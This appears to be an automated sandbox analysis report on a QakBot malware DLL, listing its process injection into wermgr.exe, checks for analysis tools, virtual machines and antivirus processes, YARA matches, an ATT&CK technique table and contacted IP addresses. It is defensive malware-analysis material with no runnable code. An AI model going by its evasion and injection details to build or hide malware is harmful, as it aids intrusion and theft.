            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: wermgr.exe, 00000016.00000003.393704756.0000000004A0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
            Source: wermgr.exe, 00000016.00000003.393704756.0000000004A0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wermgr.exe, 00000016.00000003.393704756.0000000004A0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wermgr.exe, 00000016.00000003.393704756.0000000004A0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wermgr.exe, 00000016.00000003.393704756.0000000004A0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
            Source: wermgr.exe, 00000016.00000003.393704756.0000000004A0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
            Source: wermgr.exe, 00000016.00000003.393704756.0000000004A0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wermgr.exe, 00000016.00000003.393704756.0000000004A0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 4472Thread sleep count: 192 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_15-13026
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_15-11963
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_1000B967 GetSystemInfo,15_2_1000B967
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_10009E70 FindFirstFileW,FindNextFileW,15_2_10009E70
            Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
            Source: Amcache.hve.8.drBinary or memory string: VMware
            Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
            Source: Amcache.hve.8.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
            Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
            Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.8.drBinary or memory string: VMware7,1
            Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.me
            Source: Amcache.hve.8.drBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
            Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
            Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6AD814B0 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,3_2_6AD814B0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6AD81F50 mov eax, dword ptr fs:[00000030h]3_2_6AD81F50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_10001015 mov eax, dword ptr fs:[00000030h]15_2_10001015
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_100021CD mov eax, dword ptr fs:[00000030h]15_2_100021CD
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ADC5370 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,EnterCriticalSection,TlsGetValue,GetLastError,TlsGetValue,GetLastError,LeaveCriticalSection,3_2_6ADC5370

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 2C70000Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 2C40000Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 9B3C50Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\wermgr.exe base: 2C40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\wermgr.exe base: 2C70000 protect: page read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\wermgr.exe base: 2C40000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",#1Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\wermgr.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\wermgr.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ADB3D50 cpuid 3_2_6ADB3D50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ADC52A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_6ADC52A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_1000BC31 GetCurrentProcessId,GetLastError,GetVersionExA,GetWindowsDirectoryW,15_2_1000BC31
            Source: rundll32.exe, 0000000F.00000003.383623697.000000000466F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
            Source: rundll32.exe, 0000000F.00000003.383623697.000000000466F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
            Source: rundll32.exe, 0000000F.00000003.383623697.000000000466F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
            Source: Amcache.hve.8.drBinary or memory string: c:\users\user\desktop\procexp.exe
            Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: rundll32.exe, 0000000F.00000003.383623697.000000000466F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
            Source: rundll32.exe, 0000000F.00000003.383623697.000000000466F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
            Source: Amcache.hve.8.drBinary or memory string: procexp.exe
            Source: rundll32.exe, 0000000F.00000003.383623697.000000000466F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.rundll32.exe.2980960.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.rundll32.exe.2980960.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000002.393595991.00000000045F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.393475523.000000000296A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.rundll32.exe.2980960.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.rundll32.exe.2980960.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000002.393595991.00000000045F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.393475523.000000000296A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts3
            Native API
            1
            DLL Side-Loading
            311
            Process Injection
            1
            Masquerading
            1
            Credential API Hooking
            1
            System Time Discovery
            Remote Services1
            Credential API Hooking
            Exfiltration Over Other Network Medium1
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            21
            Virtualization/Sandbox Evasion
            1
            Input Capture
            121
            Security Software Discovery
            Remote Desktop Protocol1
            Input Capture
            Exfiltration Over Bluetooth1
            Non-Standard Port
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)311
            Process Injection
            Security Account Manager21
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares1
            Archive Collected Data
            Automated Exfiltration1
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Rundll32
            NTDS2
            Process Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer11
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets1
            Remote System Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync24
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 882935 Sample: 042_qbot.dll.dat Startdate: 07/06/2023 Architecture: WINDOWS Score: 100 33 103.212.19.254 VNET-ASVNETNETWORKSPVTLTDIN India 2->33 35 184.63.133.131 VIASAT-SP-BACKBONEUS United States 2->35 37 96 other IPs or domains 2->37 47 Snort IDS alert for network traffic 2->47 49 Found malware configuration 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 4 other signatures 2->53 9 loaddll32.exe 1 2->9         started        signatures3 process4 process5 11 rundll32.exe 9->11         started        14 cmd.exe 1 9->14         started        16 rundll32.exe 9->16         started        18 8 other processes 9->18 signatures6 55 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 11->55 57 Writes to foreign memory regions 11->57 59 Allocates memory in foreign processes 11->59 61 Injects a PE file into a foreign processes 11->61 20 wermgr.exe 11->20         started        23 rundll32.exe 14->23         started        25 WerFault.exe 5 9 16->25         started        27 WerFault.exe 9 18->27         started        29 WerFault.exe 9 18->29         started        process7 dnsIp8 39 109.130.247.84, 2222 PROXIMUS-ISP-ASBE Belgium 20->39 41 www.linkedin.com 20->41 43 linkedin.com 20->43 31 WerFault.exe 21 11 23->31         started        45 192.168.2.1 unknown unknown 25->45 process9

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            042_qbot.dll.dll58%ReversingLabsWin32.Trojan.Zusy
            042_qbot.dll.dll64%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            linkedin.com
            13.107.42.14
            truefalse
              high
              www.linkedin.com
              unknown
              unknownfalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://www.linkedin.com/talent/post-a-job?trk=homepage-basic_talent-finder-cta1X93SLWC.htm.22.drfalse
                  high
                  https://sg.linkedin.com/1X93SLWC.htm.22.drfalse
                    high
                    https://nz.linkedin.com/1X93SLWC.htm.22.drfalse
                      high
                      https://www.linkedin.com/jobs/quality-assurance-jobs-h1X93SLWC.htm.22.drfalse
                        high
                        https://www.linkedin.com/pulse/topics/marketing-s2461/1X93SLWC.htm.22.drfalse
                          high
                          https://bo.linkedin.com/1X93SLWC.htm.22.drfalse
                            high
                            https://cn.linkedin.com/1X93SLWC.htm.22.drfalse
                              high
                              https://kr.linkedin.com/1X93SLWC.htm.22.drfalse
                                high
                                https://sv.linkedin.com/1X93SLWC.htm.22.drfalse
                                  high
                                  https://www.linkedin.com/signup?trk=guest_homepage-basic_directory1X93SLWC.htm.22.drfalse
                                    high
                                    https://www.linkedin.com/legal/copyright-policy?trk=homepage-basic_footer-copyright-policy1X93SLWC.htm.22.drfalse
                                      high
                                      https://static.licdn.com/aero-v1/sc/h/e12h2cd8ac580qen9qdd0qks81X93SLWC.htm.22.drfalse
                                        high
                                        https://about.linkedin.com/?trk=homepage-basic_directory_aboutUrl1X93SLWC.htm.22.drfalse
                                          high
                                          https://www.linkedin.com/jobs/search?trk=guest_homepage-basic_guest_nav_menu_jobs1X93SLWC.htm.22.drfalse
                                            high
                                            https://ec.linkedin.com/1X93SLWC.htm.22.drfalse
                                              high
                                              https://about.linkedin.com?trk=homepage-basic_footer-about1X93SLWC.htm.22.drfalse
                                                high
                                                https://ie.linkedin.com/1X93SLWC.htm.22.drfalse
                                                  high
                                                  https://www.linkedin.com/learning/topics/business-software-and-tools?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                    high
                                                    https://ae.linkedin.com/1X93SLWC.htm.22.drfalse
                                                      high
                                                      https://uk.linkedin.com/1X93SLWC.htm.22.drfalse
                                                        high
                                                        https://www.linkedin.com/salary/?trk=homepage-basic_directory_salaryHomeUrl1X93SLWC.htm.22.drfalse
                                                          high
                                                          https://developer.linkedin.com/?trk=homepage-basic_directory_developerMicrositeUrl1X93SLWC.htm.22.drfalse
                                                            high
                                                            https://www.linkedin.com/directory/posts?trk=homepage-basic_directory_postsDirectoryUrl1X93SLWC.htm.22.drfalse
                                                              high
                                                              https://www.linkedin.com/jobs/operations-jobs-h1X93SLWC.htm.22.drfalse
                                                                high
                                                                https://www.linkedin.com/learning/topics/artificial-intelligence?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                                  high
                                                                  https://www.linkedin.com/pulse/topics/healthcare-s282/1X93SLWC.htm.22.drfalse
                                                                    high
                                                                    https://in.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                      high
                                                                      https://www.linkedin.com/directory/featured?trk=homepage-basic_directory_featuredDirectoryUrl1X93SLWC.htm.22.drfalse
                                                                        high
                                                                        https://www.linkedin.com/learning/topics/audio-and-music?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                                          high
                                                                          https://www.linkedin.com/learning/topics/training-and-education?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                                            high
                                                                            https://hk.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                              high
                                                                              https://www.linkedin.com/learning/topics/visualization-and-real-time?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                                                high
                                                                                https://at.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                  high
                                                                                  https://www.linkedin.com/pulse/topics/construction-management-s831/1X93SLWC.htm.22.drfalse
                                                                                    high
                                                                                    https://www.linkedin.com/jobs/education-jobs-h1X93SLWC.htm.22.drfalse
                                                                                      high
                                                                                      https://www.linkedin.com/learning/topics/project-management?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                                                        high
                                                                                        https://www.linkedin.com/directory/articles?trk=homepage-basic_directory_articlesDirectoryUrl1X93SLWC.htm.22.drfalse
                                                                                          high
                                                                                          https://www.linkedin.com/pulse/topics/public-administration-s3697/1X93SLWC.htm.22.drfalse
                                                                                            high
                                                                                            https://za.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                              high
                                                                                              https://www.linkedin.com/directory/services?trk=homepage-basic_directory_servicesDirectoryUrl1X93SLWC.htm.22.drfalse
                                                                                                high
                                                                                                https://jm.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                  high
                                                                                                  https://no.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                    high
                                                                                                    https://www.linkedin.com/directory/learning?trk=homepage-basic_directory_learningDirectoryUrl1X93SLWC.htm.22.drfalse
                                                                                                      high
                                                                                                      https://www.linkedin.com/jobs/entrepreneurship-jobs-h1X93SLWC.htm.22.drfalse
                                                                                                        high
                                                                                                        https://pe.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                          high
                                                                                                          https://www.linkedin.com/directory/advice?trk=homepage-basic_directory_adviceDirectoryUrl1X93SLWC.htm.22.drfalse
                                                                                                            high
                                                                                                            https://au.linkedin.com/1X93SLWC.htm.22.drfalse
                                                                                                              high
                                                                                                              https://static.licdn.com/aero-v1/sc/h/ddi43qwelxeqjxdd45pe3fvs11X93SLWC.htm.22.drfalse
                                                                                                                high
                                                                                                                https://www.linkedin.com/jobs/administrative-assistant-jobs-h1X93SLWC.htm.22.drfalse
                                                                                                                  high
                                                                                                                  https://www.linkedin.com/legal/professional-community-policies?trk=homepage-basic_footer-community-g1X93SLWC.htm.22.drfalse
                                                                                                                    high
                                                                                                                    https://www.linkedin.com/legal/cookie-policy?trk=homepage-basic_footer-cookie-policy1X93SLWC.htm.22.drfalse
                                                                                                                      high
                                                                                                                      https://www.linkedin.com/signup?trk=guest_homepage-basic_nav-header-join1X93SLWC.htm.22.drfalse
                                                                                                                        high
                                                                                                                        https://www.linkedin.com/signup?trk=homepage-basic_join-cta1X93SLWC.htm.22.drfalse
                                                                                                                          high
                                                                                                                          https://www.linkedin.com/learning/topics/sales-3?trk=homepage-basic_learning-cta1X93SLWC.htm.22.drfalse
                                                                                                                            high
                                                                                                                            https://www.linkedin.com/legal/cookie-policy1X93SLWC.htm.22.drfalse
                                                                                                                              high
